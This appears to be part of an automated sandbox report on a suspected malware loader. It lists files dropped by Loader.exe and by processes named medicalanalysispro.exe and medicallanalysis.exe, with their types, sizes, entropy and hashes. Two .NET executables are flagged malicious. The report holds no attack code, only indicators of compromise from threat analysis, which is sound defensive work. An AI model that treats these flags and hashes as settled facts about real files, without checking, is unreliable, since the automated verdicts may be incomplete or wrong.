                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):247787
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.915391305945515
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:p+30cnH7ihlQT+uRm0C/vL7cvRurEQ9oTo4/1pC:p+3VnYo+WkvsJuApo4/1k
                                                                                                                                                                                                                                                                                                              MD5:F5AD16C7F0338B541978B0430D51DC83
                                                                                                                                                                                                                                                                                                              SHA1:2EA49E08B876BBD33E0A7CE75C8F371D29E1F10A
                                                                                                                                                                                                                                                                                                              SHA-256:7FBFFBC1DB3422E2101689FD88DF8384B15817B52B9B2B267B9F6D2511DC198D
                                                                                                                                                                                                                                                                                                              SHA-512:82E6749F4A6956F5B8DD5A5596CA170A1B7FF4E551714B56A293E6B8C7B092CBEC2BEC9DC0D9503404DEB8F175CBB1DED2E856C6BC829411C8ED311C1861336A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):28704114
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988773216226492
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:393216:HC+XZLPe+o6uiZho6PymMgfmynpgT56myC62gOOOvExyBNCPr1TEX0dhVjYrO7Hn:DJD462gfmy6TIqOOJBMDyX0Bhei
                                                                                                                                                                                                                                                                                                              MD5:0FB96EFD0BD550DA21DE4DC08A4C8F0C
                                                                                                                                                                                                                                                                                                              SHA1:9EE5A8A3899B77ACF168F3C1B6E745EEFCA1FB6D
                                                                                                                                                                                                                                                                                                              SHA-256:401EBB772B8452DCA28047F09CEAFD22513B4CFB80FFEA3BF23D622F8C6032AB
                                                                                                                                                                                                                                                                                                              SHA-512:9BBF04B66517258F56D6EAC4DCC8B09108726105C8E09C7CCDD7B487B2469C4ED9EDC17A2A1573E7A3ACF90D0C145ADE5CB17B8331DDDA7F44288B2418D6D927
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13202
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.737712617961208
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                                                                                                                                                                                                                                                                                              MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                                                                                                                                                                                                                                                                                              SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                                                                                                                                                                                                                                                                                              SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                                                                                                                                                                                                                                                                                              SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):231952
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8987047381149225
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:2DiL6hR+wm60gqZjJhqo2M04r7bv1XMrMxw1rl1rwj+Bmd6dYBmkW1eIjEmFdbl6:bq0jSi2Qi1B1Cay6dYBUwmPxLe3
                                                                                                                                                                                                                                                                                                              MD5:5134A2350F58890FFB9DB0B40047195D
                                                                                                                                                                                                                                                                                                              SHA1:751F548C85FA49F330CECBB1875893F971B33C4E
                                                                                                                                                                                                                                                                                                              SHA-256:2D43EB5EA9E133D2EE2405CC14F5EE08951B8361302FDD93494A3A997B508D32
                                                                                                                                                                                                                                                                                                              SHA-512:C3CDAF66A99E6336ABC80FF23374F6B62AC95AB2AE874C9075805E91D849B18E3F620CC202B4978FC92B73D98DE96089C8714B1DD096B2AE1958CFA085715F7A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2384613
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.97969261372729
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:4AMVFST+K4IV+Okq5gza804uttBkBVSHytYziSEI6WoAgdGXL:0FfK4ql5Ivu8kuSEdAgd+L
                                                                                                                                                                                                                                                                                                              MD5:6316F84BC78D40B138DAB1ADC978CA5D
                                                                                                                                                                                                                                                                                                              SHA1:B12EA05331AD89A9B09937367EBC20421F17B9FF
                                                                                                                                                                                                                                                                                                              SHA-256:D637E3326F87A173ABD5F51AC98906A3237B9E511D07D31D6AAFCF43F33DAC17
                                                                                                                                                                                                                                                                                                              SHA-512:1CDCA01ED9C2BC607207C8C51F4B532F4153E94B3846308332ECCAE25F9C5FDDF8279E3063F44A75DD43D696EAB0F9F340F9BF2F3EC805AB0F2F1DE5135A426C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):106006
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.823795646704166
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:CPj4aLCBcnn4xGrpR7H30x4VTNVNM43QHt0msLiWzO5SQJn4494m75CYl3U:ETCBmnoCptBNNVNzQ6e5SQW494mlZ2
                                                                                                                                                                                                                                                                                                              MD5:0C8768CDEB3E894798F80465E0219C05
                                                                                                                                                                                                                                                                                                              SHA1:C4DA07AC93E4E547748ECC26B633D3DB5B81CE47
                                                                                                                                                                                                                                                                                                              SHA-256:15F36830124FC7389E312CF228B952024A8CE8601BF5C4DF806BC395D47DB669
                                                                                                                                                                                                                                                                                                              SHA-512:35DB507A3918093B529547E991AB6C1643A96258FC95BA1EA7665FF762B0B8ABB1EF732B3854663A947EFFE505BE667BD2609FFCCCB6409A66DF605F971DA106
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):475905
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8713354167151675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:pyfuv+DnikW2IfqFXKzNGNyyRmfD4vCgdiRST:pLWDnid2IfZGAyAfczdig
                                                                                                                                                                                                                                                                                                              MD5:7E5E3D6D352025BD7F093C2D7F9B21AB
                                                                                                                                                                                                                                                                                                              SHA1:AD9BFC2C3D70C574D34A752C5D0EBCC43A046C57
                                                                                                                                                                                                                                                                                                              SHA-256:5B37E8FF2850A4CBB02F9F02391E9F07285B4E0667F7E4B2D4515B78E699735A
                                                                                                                                                                                                                                                                                                              SHA-512:C19C29F8AD8B6BEB3EED40AB7DC343468A4CA75D49F1D0D4EA0B4A5CEE33F745893FBA764D35C8BD157F7842268E0716B1EB4B8B26DCF888FB3B3F4314844AAD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17374
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.682654493549437
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                                                                                                                                                                                                                                                                                              MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                                                                                                                                                                                                                                                                                              SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                                                                                                                                                                                                                                                                                              SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                                                                                                                                                                                                                                                                                              SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):704689
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.834558665203789
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:sSn9gd/GXLtKb+Ozu5idmEfcHOPJZ7bw1kXn0yZLJZsDDpJSWB5qSEhQ:sMw/GXUb+euCVIOxRQIZOnuK
                                                                                                                                                                                                                                                                                                              MD5:6696368A09C7F8FED4EA92C4E5238CEE
                                                                                                                                                                                                                                                                                                              SHA1:F89C282E557D1207AFD7158B82721C3D425736A7
                                                                                                                                                                                                                                                                                                              SHA-256:C25D7A7B8F0715729BCCB817E345F0FDD668DD4799C8DAB1A4DB3D6A37E7E3E4
                                                                                                                                                                                                                                                                                                              SHA-512:0AB24F07F956E3CDCD9D09C3AA4677FF60B70D7A48E7179A02E4FF9C0D2C7A1FC51624C3C8A5D892644E9F36F84F7AAF4AA6D2C9E1C291C88B3CFF7568D54F76
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):52081
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.732227829944057
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:1shuTqhiMtf/2PXkXgjYcO1556i/canPH1y3F95grf5CjdKBfn602ZhqsNgsSJ+y:nw1pywCjUfnX
                                                                                                                                                                                                                                                                                                              MD5:D093F94C050D5900795DE8149CB84817
                                                                                                                                                                                                                                                                                                              SHA1:54058DDA5C9E66A22074590072C8A48559BBA1FB
                                                                                                                                                                                                                                                                                                              SHA-256:4BEC0794A0D69DEBE2F955BF495EA7C0858AD84CB0D2D549CACB82E70C060CBA
                                                                                                                                                                                                                                                                                                              SHA-512:3FAAA415FBA5745298981014D0042E8E01850FCCAAC22F92469765FD8C56B920DA877FF3138A629242D9C52E270E7E2CE89E7C69F6902859F48EA0359842E2FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17135
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.7352982443766
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:fSw3uFslDvQGOoqdoUFKgvXj9jmHo5+FejOcEDffWPvy:KwJlrQGOdoUFKgvTmn6y
                                                                                                                                                                                                                                                                                                              MD5:FDE38932B12FC063451AF6613D4470CC
                                                                                                                                                                                                                                                                                                              SHA1:BC08C114681A3AFC05FB8C0470776C3EAE2EEFEB
                                                                                                                                                                                                                                                                                                              SHA-256:9967EA3C3D1AEE8DB5A723F714FBA38D2FC26D8553435AB0E1D4E123CD211830
                                                                                                                                                                                                                                                                                                              SHA-512:0F211F81101CED5FFF466F2AAB0E6C807BB18B23BC4928FE664C60653C99FA81B34EDF5835FCC3AFFB34B0DF1FA61C73A621DF41355E4D82131F94FCC0B0E839
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20103
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.62878564707382
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:LbCDj5HBuJXm9XPDUbrXywgqYw6QENTQxS76lXtz2MQHZg6+Cr:L+D/MXADerZgfwcQi6lXtz2MQHZg6+Cr
                                                                                                                                                                                                                                                                                                              MD5:D963210C02CD1825E967086827DA8294
                                                                                                                                                                                                                                                                                                              SHA1:26C4D004B5FFDB8F81DE2D6B158A3F34819FAF01
                                                                                                                                                                                                                                                                                                              SHA-256:7908145CF17301BEDEFD6E3AF8C93E0320582C0562919FFB56CC21B7FD532B96
                                                                                                                                                                                                                                                                                                              SHA-512:756C21DC1A02D579F0E2ED39E5BEDCA5491087CDC28E3E96C8663A493BCFEEEEEA44DC40681EC6341426DFA995883DBCE11B76D1F921E043AE220399A9E554FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1177648
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.91949701328009
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:cP4MBZrpGi4exQ9qdXVd/F/3yy7mgviLzIM:czHMi4eKCd/BzaLcM
                                                                                                                                                                                                                                                                                                              MD5:D5EF47C915BEF65A63D364F5CF7CD467
                                                                                                                                                                                                                                                                                                              SHA1:F711F3846E144DDDBFB31597C0C165BA8ADF8D6B
                                                                                                                                                                                                                                                                                                              SHA-256:9C287472408857301594F8F7BDA108457F6FDAE6E25C87EC88DBF3012E5A98B6
                                                                                                                                                                                                                                                                                                              SHA-512:04AEB956BFCD3BD23B540F9AD2D4110BB2FFD25FE899152C4B2E782DAA23A676DF9507078ECF1BFC409DDFBE2858AB4C4C324F431E45D8234E13905EB192BAE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20151
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.765220504812666
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:dti5BMxSo4LgAAsJilYcmwPbEM0Av7wGkJXbhS1OaVKD6U2:DqoCgqyIMZwRJLQO5eU2
                                                                                                                                                                                                                                                                                                              MD5:0A79304556A1289AA9E6213F574F3B08
                                                                                                                                                                                                                                                                                                              SHA1:7EE3BDE3B1777BF65D4F62CE33295556223A26CD
                                                                                                                                                                                                                                                                                                              SHA-256:434E57FFFC7DF0B725C1D95CABAFDCDB83858CCB3E5E728A74D3CF33A0CA9C79
                                                                                                                                                                                                                                                                                                              SHA-512:1560703D0C162D73C99CEF9E8DDC050362E45209CC8DEA6A34A49E2B6F99AAE462EAE27BA026BDB29433952B6696896BB96998A0F6AC0A3C1DBBB2F6EBC26A7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):97358
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9345189846943915
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:yZwgOueuKZ4THgWvLnhgmmJFgVn+nhEA1ODIrSrUricEDMrV+LAB:yZwgwuKmTDFgmmoVn+mAUhrUicRoAB
                                                                                                                                                                                                                                                                                                              MD5:4BC2AEA7281E27BC91566377D0ED1897
                                                                                                                                                                                                                                                                                                              SHA1:D02D897E8A8ACA58E3635C009A16D595A5649D44
                                                                                                                                                                                                                                                                                                              SHA-256:4AEF566BBF3F0B56769A0C45275EBBF7894E9DDB54430C9DB2874124B7CEA288
                                                                                                                                                                                                                                                                                                              SHA-512:DA35BB2F67BCA7527DC94E5A99A162180B2701DDCA2C688D9E0BE69876ACA7C48F192D0F03D431CCD2D8EEC55E0E681322B4F15EBA4DB29EF5557316E8E51E10
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13213
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.627776815487544
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:yXmigootuYzXKKk6BL8UUJY0eP6nHY2AJ4qxivXRp2gFyjSonqKLRM7RbEZ:Km0WzX7k6eJB06HZYwRzFyj0uRM7RbEZ
                                                                                                                                                                                                                                                                                                              MD5:20F6F88989E806D23C29686B090F6190
                                                                                                                                                                                                                                                                                                              SHA1:1FDB9A66BB5CA587C05D3159829A8780BB66C87D
                                                                                                                                                                                                                                                                                                              SHA-256:9D5F06D539B91E98FD277FC01FD2F9AF6FEA58654E3B91098503B235A83ABB16
                                                                                                                                                                                                                                                                                                              SHA-512:2798BB1DD0AA121CD766BD5B47D256B1A528E9DB83ED61311FA685F669B7F60898118AE8C69D2A30D746AF362B810B133103CBE426E0293DD2111ACA1B41CCEA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):350645
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.923404487115684
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:C12HHimPXaabXTLqQt/ujrjUqGSEzZn/K0qeW79ix6vEF0FYqPfW:CCx3bXTGoGvJGSCtqeyIovECdPfW
                                                                                                                                                                                                                                                                                                              MD5:36145FEE38E79B81035787F1BE296A52
                                                                                                                                                                                                                                                                                                              SHA1:33EE82E324F4B1E40167F3DC5E01234A1C5CAB61
                                                                                                                                                                                                                                                                                                              SHA-256:6EBE6ABD7775C10A49407AE22DB45C840CD2CDAF715866A5B0B5AF70941C3F4A
                                                                                                                                                                                                                                                                                                              SHA-512:3B00B07320831F075A6AF9AC1863B8756FE4F99A1B4F2E53578DCA17FDAF7BDB147279225045E9EEEBA4898FE321CF5457832B8E6A1A5B71ACFF9A1C10392659
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41203
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.855219741633254
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:CkwPhOR4PpSvw6vob5IJ9eoYUx7eBr9HDhzCZ+8ylnm1fjiUNcS5cXeK/7DaeR7g:CRPhOR4B0reWJYURuHN4ylnaeSI4
                                                                                                                                                                                                                                                                                                              MD5:CAAFE376AFB7086DCBEE79F780394CA3
                                                                                                                                                                                                                                                                                                              SHA1:DA76CA59F6A57EE3102F8F9BD9CEE742973EFA8A
                                                                                                                                                                                                                                                                                                              SHA-256:18C4A0095D5C1DA6B817592E767BB23D29DD2F560AD74DF75FF3961DBDE25B79
                                                                                                                                                                                                                                                                                                              SHA-512:5DD6271FD5B34579D8E66271BAB75C89BACA8B2EBEAA9966DE391284BD08F2D720083C6E0E1EDDA106ECF8A04E9A32116DE6873F0F88C19C049C0FE27E5D820B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15257
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.804568217256536
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:wyBOIrDL/vJ0RWNML2NyWKr362ByOikGnqO5Vyb3Uab+UtJIdgihtqSXs:wyBnxxMLg7KrqU7Gnqrb3lhtuF/qS8
                                                                                                                                                                                                                                                                                                              MD5:722BB90689AECC523E3FE317E1F0984B
                                                                                                                                                                                                                                                                                                              SHA1:8DACF9514F0C707CBBCDD6FD699E8940D42FB54E
                                                                                                                                                                                                                                                                                                              SHA-256:0966E86FFFA5BE52D3D9E7B89DD674D98A03EED0A454FBAF7C1BD9493BD9D874
                                                                                                                                                                                                                                                                                                              SHA-512:D5EFFBFA105BCD615E56EF983075C9EF0F52BCFDBEFA3CE8CEA9550F25B859E48B32F2EC9AA7A305C6611A3BE5E0CDE0D269588D9C2897CA987359B77213331D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):105007
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8886535210991395
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Dxpeuv7xOoWmvqcQurq8vGDTRAi5yRdPPl/CJqM9ggS3OIrBTH6x0:Fguv7cfmJrUOiYRbXMbS3Ooox0
                                                                                                                                                                                                                                                                                                              MD5:0FD8BC4F0F2E37FEB1EFC474D037AF55
                                                                                                                                                                                                                                                                                                              SHA1:ADD8FFACE4C1936787EB4BFFE4EA944A13467D53
                                                                                                                                                                                                                                                                                                              SHA-256:1E31EF3145D1E30B31107B7AFC4A61011EBCA99550DCE65F945C2EA4CCAC714B
                                                                                                                                                                                                                                                                                                              SHA-512:29DE5832DB5B43FDC99BB7EA32A7359441D6CF5C05561DD0A6960B33078471E4740EE08FFBD97A5CED4B7DD9CC98FAD6ADD43EDB4418BF719F90F83C58188149
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):93696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.714493816202374
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:V6DdyQDw4KX9wG0ess6PHZGwZAnK+dJr/eXYvJGrm4M/4YyUM:oVcwKD6PHMOAKVXYvJCm4M/Ryl
                                                                                                                                                                                                                                                                                                              MD5:443B43ADCB78164D40C977ABAC54C18E
                                                                                                                                                                                                                                                                                                              SHA1:84E8738D90770806B8533E5A412FEAB161DE2382
                                                                                                                                                                                                                                                                                                              SHA-256:8E2EC352E0EC1212011FEFD1ABE73FCBBCE42BEC907525922BA7C64EAF26BA24
                                                                                                                                                                                                                                                                                                              SHA-512:80232FC1C89066BA24F22AAAF00FB49BA13917C938C4B8B64933617EE3DE844BE2CD3A9DC2426DA846750A1AF50E933B553DC5A5C4DBB2D33332FF202532F8D1
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.720210063776194
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:7cJtQnNnab3OwLhAETjZn8eAemp/wDmrDpz+spCl:7cJinNab3ZSkjZn8eAfp/wDqljpCl
                                                                                                                                                                                                                                                                                                              MD5:2DBC39DCE4C3B66019E84A28A342EAD0
                                                                                                                                                                                                                                                                                                              SHA1:7AB924FE7875C17BFA2700678833C612C487441B
                                                                                                                                                                                                                                                                                                              SHA-256:DDCFD38B862FDB8E8BD1C34B7D1FD3928E1A5EDABE0CB4A627717FC89F5F6186
                                                                                                                                                                                                                                                                                                              SHA-512:D4AB406B5D85D42C1572D4E23DC71342EEAF1473A56045BE0189AF8946C99E70A274FAAB6135A1B08205422B31B4917A45146674FDF895A115CE96F7D76E84F6
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2540
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                              MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                              SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                              SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                              SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2540
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.801552142126602
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CDAZse4GVajjgsrMM7wEIyxduDwLHXsZ5z/C2iJQ7sKXhVFm1:C+sfGEjgsgM7lIKuK3qB6HJQ7BFm
                                                                                                                                                                                                                                                                                                              MD5:CBC6B2AD4BF883EA7ECB41D8D86B0964
                                                                                                                                                                                                                                                                                                              SHA1:3051043976773ABFC145A23942B42E4C7CAC5A1C
                                                                                                                                                                                                                                                                                                              SHA-256:C8844BA7CA7DF3C75532044792065C3D2B742C389FC9FA1A6E2776ED425917AF
                                                                                                                                                                                                                                                                                                              SHA-512:355B1E180D067ABAAB69F1F51CF0776DEE7156156195094825A1BA7FAC3BCF7AB303B5D68BE373878F400CD34EC9061DC549706B8AD344E66AC8968DAA7E812F
